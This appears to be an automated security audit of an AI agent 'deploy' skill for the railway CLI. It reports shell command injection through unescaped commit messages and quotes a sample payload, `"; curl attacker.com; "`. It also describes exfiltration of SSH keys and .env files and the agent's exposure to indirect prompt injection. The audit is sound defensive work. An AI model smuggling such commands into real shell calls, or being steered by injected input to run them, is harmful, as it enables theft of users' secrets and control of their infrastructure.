deploy
Fail
Audited by Gen Agent Trust Hub on Feb 17, 2026
Risk Level: HIGHCOMMAND_EXECUTIONDATA_EXFILTRATIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill constructs shell commands by interpolating user-provided commit messages directly into the
-mflag of therailway upcommand. A malicious user could provide a message containing shell metacharacters (e.g.,\"; curl attacker.com; \") to break out of the intended command and execute arbitrary code.\n - Evidence:
SKILL.mdcontains the patternrailway up --detach -m \"[USER_MESSAGE]\".\n- [DATA_EXFILTRATION] (HIGH): In conjunction with the command injection vulnerability, an attacker can execute commands to read and transmit sensitive files (like~/.ssh/id_rsaor.envfiles) to an external server.\n- [PROMPT_INJECTION] (LOW): The skill is susceptible to Indirect Prompt Injection (Category 8) due to its handling of untrusted user data.\n - Ingestion points: User-provided commit messages (
-m) and service names inSKILL.mdandreferences/environment-config.md.\n - Boundary markers: Absent. The instructions do not define delimiters or provide warnings to the agent about treating user input as untrusted.\n
- Capability inventory: Access to the
Bashtool withrailway:*permissions, which can modify cloud infrastructure and access local files.\n - Sanitization: Absent. There are no instructions for the agent to escape shell characters or validate the structure of the user-provided message.
Recommendations
- AI detected serious security threats
Audit Metadata